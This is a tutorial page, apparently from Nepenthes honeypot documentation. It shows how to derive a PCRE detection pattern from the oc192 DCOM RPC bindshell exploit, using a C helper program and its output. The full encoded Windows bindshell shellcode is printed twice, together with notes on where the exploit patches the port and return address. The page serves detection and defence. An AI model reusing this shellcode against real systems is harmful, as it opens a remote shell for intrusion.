How to create pcre patterns from POC Exploits

Foreword

The Exploit used here is quite old, not to say really old.
We decided to show how to create a pcre in no time on based on the dcom exploit by oc192.

Requirements

Getting Started

After downloading the exploit, we need to have a look on the shellcode used there.

the shellcode used is this

unsigned char sc[]=
    "\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00"
    "\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00\x46\x00\x58\x00"
    "\x46\x00\x58\x00\x46\x00\x58\x00"
 
    "\xff\xff\xff\xff" /* return address */
    
    "\xcc\xe0\xfd\x7f" /* primary thread data block */
    "\xcc\xe0\xfd\x7f" /* primary thread data block */
 
    /* bindshell no RPC crash, defineable spawn port */
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\xeb\x19\x5e\x31\xc9\x81\xe9\x89\xff"
    "\xff\xff\x81\x36\x80\xbf\x32\x94\x81\xee\xfc\xff\xff\xff\xe2\xf2"
    "\xeb\x05\xe8\xe2\xff\xff\xff\x03\x53\x06\x1f\x74\x57\x75\x95\x80"
    "\xbf\xbb\x92\x7f\x89\x5a\x1a\xce\xb1\xde\x7c\xe1\xbe\x32\x94\x09"
    "\xf9\x3a\x6b\xb6\xd7\x9f\x4d\x85\x71\xda\xc6\x81\xbf\x32\x1d\xc6"
    "\xb3\x5a\xf8\xec\xbf\x32\xfc\xb3\x8d\x1c\xf0\xe8\xc8\x41\xa6\xdf"
    "\xeb\xcd\xc2\x88\x36\x74\x90\x7f\x89\x5a\xe6\x7e\x0c\x24\x7c\xad"
    "\xbe\x32\x94\x09\xf9\x22\x6b\xb6\xd7\xdd\x5a\x60\xdf\xda\x8a\x81"
    "\xbf\x32\x1d\xc6\xab\xcd\xe2\x84\xd7\xf9\x79\x7c\x84\xda\x9a\x81"
    "\xbf\x32\x1d\xc6\xa7\xcd\xe2\x84\xd7\xeb\x9d\x75\x12\xda\x6a\x80"
    "\xbf\x32\x1d\xc6\xa3\xcd\xe2\x84\xd7\x96\x8e\xf0\x78\xda\x7a\x80"
    "\xbf\x32\x1d\xc6\x9f\xcd\xe2\x84\xd7\x96\x39\xae\x56\xda\x4a\x80"
    "\xbf\x32\x1d\xc6\x9b\xcd\xe2\x84\xd7\xd7\xdd\x06\xf6\xda\x5a\x80"
    "\xbf\x32\x1d\xc6\x97\xcd\xe2\x84\xd7\xd5\xed\x46\xc6\xda\x2a\x80"
    "\xbf\x32\x1d\xc6\x93\x01\x6b\x01\x53\xa2\x95\x80\xbf\x66\xfc\x81"
    "\xbe\x32\x94\x7f\xe9\x2a\xc4\xd0\xef\x62\xd4\xd0\xff\x62\x6b\xd6"
    "\xa3\xb9\x4c\xd7\xe8\x5a\x96\x80\xae\x6e\x1f\x4c\xd5\x24\xc5\xd3"
    "\x40\x64\xb4\xd7\xec\xcd\xc2\xa4\xe8\x63\xc7\x7f\xe9\x1a\x1f\x50"
    "\xd7\x57\xec\xe5\xbf\x5a\xf7\xed\xdb\x1c\x1d\xe6\x8f\xb1\x78\xd4"
    "\x32\x0e\xb0\xb3\x7f\x01\x5d\x03\x7e\x27\x3f\x62\x42\xf4\xd0\xa4"
    "\xaf\x76\x6a\xc4\x9b\x0f\x1d\xd4\x9b\x7a\x1d\xd4\x9b\x7e\x1d\xd4"
    "\x9b\x62\x19\xc4\x9b\x22\xc0\xd0\xee\x63\xc5\xea\xbe\x63\xc5\x7f"
    "\xc9\x02\xc5\x7f\xe9\x22\x1f\x4c\xd5\xcd\x6b\xb1\x40\x64\x98\x0b"
    "\x77\x65\x6b\xd6\x93\xcd\xc2\x94\xea\x64\xf0\x21\x8f\x32\x94\x80"
    "\x3a\xf2\xec\x8c\x34\x72\x98\x0b\xcf\x2e\x39\x0b\xd7\x3a\x7f\x89"
    "\x34\x72\xa0\x0b\x17\x8a\x94\x80\xbf\xb9\x51\xde\xe2\xf0\x90\x80"
    "\xec\x67\xc2\xd7\x34\x5e\xb0\x98\x34\x77\xa8\x0b\xeb\x37\xec\x83"
    "\x6a\xb9\xde\x98\x34\x68\xb4\x83\x62\xd1\xa6\xc9\x34\x06\x1f\x83"
    "\x4a\x01\x6b\x7c\x8c\xf2\x38\xba\x7b\x46\x93\x41\x70\x3f\x97\x78"
    "\x54\xc0\xaf\xfc\x9b\x26\xe1\x61\x34\x68\xb0\x83\x62\x54\x1f\x8c"
    "\xf4\xb9\xce\x9c\xbc\xef\x1f\x84\x34\x31\x51\x6b\xbd\x01\x54\x0b"
    "\x6a\x6d\xca\xdd\xe4\xf0\x90\x80\x2f\xa2\x04";

No we lookup where and how the shellcode is changed to set the bindport and the offset.
We find:

    /* drg */   
    lportl=htons(lportl);
    memcpy(&lport[1], &lportl, 2);
    *(long*)lport = *(long*)lport ^ 0x9432BF80;
    memcpy(&sc[471],&lport,4);
 
    memcpy(sc+36, (unsigned char *) &targets[type].ret, 4);

So

at ‘address’ 471 4 bytes are changed to fit the port, we need this information
at ‘address’ 36 4 bytes are changed too, we dont need this information

No we create to create a mkpcre variant fitting these needs.

#include <stdio.h>
 
unsigned char data[]=
    "\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00"
    "\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00\x46\x00\x58\x00"
    "\x46\x00\x58\x00\x46\x00\x58\x00"
 
    "\xff\xff\xff\xff" /* return address */
    
    "\xcc\xe0\xfd\x7f" /* primary thread data block */
    "\xcc\xe0\xfd\x7f" /* primary thread data block */
 
    /* bindshell no RPC crash, defineable spawn port */
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\xeb\x19\x5e\x31\xc9\x81\xe9\x89\xff"
    "\xff\xff\x81\x36\x80\xbf\x32\x94\x81\xee\xfc\xff\xff\xff\xe2\xf2"
    "\xeb\x05\xe8\xe2\xff\xff\xff\x03\x53\x06\x1f\x74\x57\x75\x95\x80"
    "\xbf\xbb\x92\x7f\x89\x5a\x1a\xce\xb1\xde\x7c\xe1\xbe\x32\x94\x09"
    "\xf9\x3a\x6b\xb6\xd7\x9f\x4d\x85\x71\xda\xc6\x81\xbf\x32\x1d\xc6"
    "\xb3\x5a\xf8\xec\xbf\x32\xfc\xb3\x8d\x1c\xf0\xe8\xc8\x41\xa6\xdf"
    "\xeb\xcd\xc2\x88\x36\x74\x90\x7f\x89\x5a\xe6\x7e\x0c\x24\x7c\xad"
    "\xbe\x32\x94\x09\xf9\x22\x6b\xb6\xd7\xdd\x5a\x60\xdf\xda\x8a\x81"
    "\xbf\x32\x1d\xc6\xab\xcd\xe2\x84\xd7\xf9\x79\x7c\x84\xda\x9a\x81"
    "\xbf\x32\x1d\xc6\xa7\xcd\xe2\x84\xd7\xeb\x9d\x75\x12\xda\x6a\x80"
    "\xbf\x32\x1d\xc6\xa3\xcd\xe2\x84\xd7\x96\x8e\xf0\x78\xda\x7a\x80"
    "\xbf\x32\x1d\xc6\x9f\xcd\xe2\x84\xd7\x96\x39\xae\x56\xda\x4a\x80"
    "\xbf\x32\x1d\xc6\x9b\xcd\xe2\x84\xd7\xd7\xdd\x06\xf6\xda\x5a\x80"
    "\xbf\x32\x1d\xc6\x97\xcd\xe2\x84\xd7\xd5\xed\x46\xc6\xda\x2a\x80"
    "\xbf\x32\x1d\xc6\x93\x01\x6b\x01\x53\xa2\x95\x80\xbf\x66\xfc\x81"
    "\xbe\x32\x94\x7f\xe9\x2a\xc4\xd0\xef\x62\xd4\xd0\xff\x62\x6b\xd6"
    "\xa3\xb9\x4c\xd7\xe8\x5a\x96\x80\xae\x6e\x1f\x4c\xd5\x24\xc5\xd3"
    "\x40\x64\xb4\xd7\xec\xcd\xc2\xa4\xe8\x63\xc7\x7f\xe9\x1a\x1f\x50"
    "\xd7\x57\xec\xe5\xbf\x5a\xf7\xed\xdb\x1c\x1d\xe6\x8f\xb1\x78\xd4"
    "\x32\x0e\xb0\xb3\x7f\x01\x5d\x03\x7e\x27\x3f\x62\x42\xf4\xd0\xa4"
    "\xaf\x76\x6a\xc4\x9b\x0f\x1d\xd4\x9b\x7a\x1d\xd4\x9b\x7e\x1d\xd4"
    "\x9b\x62\x19\xc4\x9b\x22\xc0\xd0\xee\x63\xc5\xea\xbe\x63\xc5\x7f"
    "\xc9\x02\xc5\x7f\xe9\x22\x1f\x4c\xd5\xcd\x6b\xb1\x40\x64\x98\x0b"
    "\x77\x65\x6b\xd6\x93\xcd\xc2\x94\xea\x64\xf0\x21\x8f\x32\x94\x80"
    "\x3a\xf2\xec\x8c\x34\x72\x98\x0b\xcf\x2e\x39\x0b\xd7\x3a\x7f\x89"
    "\x34\x72\xa0\x0b\x17\x8a\x94\x80\xbf\xb9\x51\xde\xe2\xf0\x90\x80"
    "\xec\x67\xc2\xd7\x34\x5e\xb0\x98\x34\x77\xa8\x0b\xeb\x37\xec\x83"
    "\x6a\xb9\xde\x98\x34\x68\xb4\x83\x62\xd1\xa6\xc9\x34\x06\x1f\x83"
    "\x4a\x01\x6b\x7c\x8c\xf2\x38\xba\x7b\x46\x93\x41\x70\x3f\x97\x78"
    "\x54\xc0\xaf\xfc\x9b\x26\xe1\x61\x34\x68\xb0\x83\x62\x54\x1f\x8c"
    "\xf4\xb9\xce\x9c\xbc\xef\x1f\x84\x34\x31\x51\x6b\xbd\x01\x54\x0b"
    "\x6a\x6d\xca\xdd\xe4\xf0\x90\x80\x2f\xa2\x04";
 
 
typedef struct
{
  unsigned int  m_offset;
  unsigned int  m_size;
  bool          m_parenthesis;
} pcre_helper;
 
 
pcre_helper myhelper[]=
{
      {       36,    4,      false    }, // this is the offset to fit the target os, address 36, 4 bytes long, we dont need it, so no parenthesis
      {       471,    4,      true    } // <- this is the bind port on address 471 4 bytes long, as wee need the data we use parenthesis here
 
 
};
 
 
int main()
{
        unsigned int sixteen=100;
        bool done=false;
        for( unsigned int i=0;i<sizeof(data)-1;i++,sixteen++)
        {
                done = false;
                for (unsigned int j=0;j<sizeof(myhelper)/sizeof(pcre_helper);j++)
                {
                        if ( i >= myhelper[j].m_offset && i < ( myhelper[j].m_offset + myhelper[j].m_size ) )
                        {
                                done = true;
                                if (  myhelper[j].m_parenthesis )
                                {
                                        if ( i == myhelper[j].m_offset )
                                        {
                                                printf("(");
                                                printf(".");
                                        }else
                                        if ( i == (myhelper[j].m_offset  + myhelper[j].m_size -1 ) )
                                        {
                                                printf(".");
                                                printf(")");
                                        }else
                                        {
                                                printf(".");
                                        }
                                }else
                                {
                                        printf(".");
                                }
                        }
                }
                if ( done == false)
                        printf("\\\\x%02X",data[i]);
 
 
                if ( sixteen == 115 )
                {
                        printf("\n");
                        sixteen = 99;
                }
 
        }
 
}

compile this variant

g++ -o oc192pre ocre192pcre.c

and run it

./oc192pare
\\x46\\x00\\x58\\x00\\x4E\\x00\\x42\\x00\\x46\\x00\\x58\\x00\\x46\\x00\\x58\\x00
\\x4E\\x00\\x42\\x00\\x46\\x00\\x58\\x00\\x46\\x00\\x58\\x00\\x46\\x00\\x58\\x00
\\x46\\x00\\x58\\x00....\\xCC\\xE0\\xFD\\x7F\\xCC\\xE0\\xFD\\x7F
\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90
\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90
\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90
\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90
\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90
\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90
\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90
\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90
\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90
\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90
\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\xEB\\x19\\x5E\\x31\\xC9\\x81\\xE9\\x89\\xFF
\\xFF\\xFF\\x81\\x36\\x80\\xBF\\x32\\x94\\x81\\xEE\\xFC\\xFF\\xFF\\xFF\\xE2\\xF2
\\xEB\\x05\\xE8\\xE2\\xFF\\xFF\\xFF\\x03\\x53\\x06\\x1F\\x74\\x57\\x75\\x95\\x80
\\xBF\\xBB\\x92\\x7F\\x89\\x5A\\x1A\\xCE\\xB1\\xDE\\x7C\\xE1\\xBE\\x32\\x94\\x09
\\xF9\\x3A\\x6B\\xB6\\xD7\\x9F\\x4D\\x85\\x71\\xDA\\xC6\\x81\\xBF\\x32\\x1D\\xC6
\\xB3\\x5A\\xF8\\xEC\\xBF\\x32\\xFC\\xB3\\x8D\\x1C\\xF0\\xE8\\xC8\\x41\\xA6\\xDF
\\xEB\\xCD\\xC2\\x88\\x36\\x74\\x90\\x7F\\x89\\x5A\\xE6\\x7E\\x0C\\x24\\x7C\\xAD
\\xBE\\x32\\x94\\x09\\xF9\\x22\\x6B\\xB6\\xD7\\xDD\\x5A\\x60\\xDF\\xDA\\x8A\\x81
\\xBF\\x32\\x1D\\xC6\\xAB\\xCD\\xE2\\x84\\xD7\\xF9\\x79\\x7C\\x84\\xDA\\x9A\\x81
\\xBF\\x32\\x1D\\xC6\\xA7\\xCD\\xE2\\x84\\xD7\\xEB\\x9D\\x75\\x12\\xDA\\x6A\\x80
\\xBF\\x32\\x1D\\xC6\\xA3\\xCD\\xE2\\x84\\xD7\\x96\\x8E\\xF0\\x78\\xDA\\x7A\\x80
\\xBF\\x32\\x1D\\xC6\\x9F\\xCD\\xE2\\x84\\xD7\\x96\\x39\\xAE\\x56\\xDA\\x4A\\x80
\\xBF\\x32\\x1D\\xC6\\x9B\\xCD\\xE2\\x84\\xD7\\xD7\\xDD\\x06\\xF6\\xDA\\x5A\\x80
\\xBF\\x32\\x1D\\xC6\\x97\\xCD\\xE2\\x84\\xD7\\xD5\\xED\\x46\\xC6\\xDA\\x2A\\x80
\\xBF\\x32\\x1D\\xC6\\x93\\x01\\x6B\\x01\\x53\\xA2\\x95\\x80\\xBF\\x66\\xFC\\x81
\\xBE\\x32\\x94\\x7F\\xE9\\x2A\\xC4\\xD0\\xEF\\x62\\xD4\\xD0\\xFF\\x62\\x6B\\xD6
\\xA3\\xB9\\x4C\\xD7\\xE8\\x5A\\x96(....)\\x4C\\xD5\\x24\\xC5\\xD3
\\x40\\x64\\xB4\\xD7\\xEC\\xCD\\xC2\\xA4\\xE8\\x63\\xC7\\x7F\\xE9\\x1A\\x1F\\x50
\\xD7\\x57\\xEC\\xE5\\xBF\\x5A\\xF7\\xED\\xDB\\x1C\\x1D\\xE6\\x8F\\xB1\\x78\\xD4
\\x32\\x0E\\xB0\\xB3\\x7F\\x01\\x5D\\x03\\x7E\\x27\\x3F\\x62\\x42\\xF4\\xD0\\xA4
\\xAF\\x76\\x6A\\xC4\\x9B\\x0F\\x1D\\xD4\\x9B\\x7A\\x1D\\xD4\\x9B\\x7E\\x1D\\xD4
\\x9B\\x62\\x19\\xC4\\x9B\\x22\\xC0\\xD0\\xEE\\x63\\xC5\\xEA\\xBE\\x63\\xC5\\x7F
\\xC9\\x02\\xC5\\x7F\\xE9\\x22\\x1F\\x4C\\xD5\\xCD\\x6B\\xB1\\x40\\x64\\x98\\x0B
\\x77\\x65\\x6B\\xD6\\x93\\xCD\\xC2\\x94\\xEA\\x64\\xF0\\x21\\x8F\\x32\\x94\\x80
\\x3A\\xF2\\xEC\\x8C\\x34\\x72\\x98\\x0B\\xCF\\x2E\\x39\\x0B\\xD7\\x3A\\x7F\\x89
\\x34\\x72\\xA0\\x0B\\x17\\x8A\\x94\\x80\\xBF\\xB9\\x51\\xDE\\xE2\\xF0\\x90\\x80
\\xEC\\x67\\xC2\\xD7\\x34\\x5E\\xB0\\x98\\x34\\x77\\xA8\\x0B\\xEB\\x37\\xEC\\x83
\\x6A\\xB9\\xDE\\x98\\x34\\x68\\xB4\\x83\\x62\\xD1\\xA6\\xC9\\x34\\x06\\x1F\\x83
\\x4A\\x01\\x6B\\x7C\\x8C\\xF2\\x38\\xBA\\x7B\\x46\\x93\\x41\\x70\\x3F\\x97\\x78
\\x54\\xC0\\xAF\\xFC\\x9B\\x26\\xE1\\x61\\x34\\x68\\xB0\\x83\\x62\\x54\\x1F\\x8C
\\xF4\\xB9\\xCE\\x9C\\xBC\\xEF\\x1F\\x84\\x34\\x31\\x51\\x6B\\xBD\\x01\\x54\\x0B
\\x6A\\x6D\\xCA\\xDD\\xE4\\xF0\\x90\\x80\\x2F\\xA2\\x04

this is a perfect pcre to match the oc192 bindshell exploit.
the port is on pcre_substring #1
to gain the port in networkbyteorder we have to xor it again with 0x9432BF80.
as stated here

    *(long*)lport = *(long*)lport ^ 0x9432BF80;

1) Part of the Nepenthes distribution - have a look in tools/.

nepenthes

Development

Scene

Service

Misc

How to create pcre patterns from POC Exploits

Foreword

Requirements

Getting Started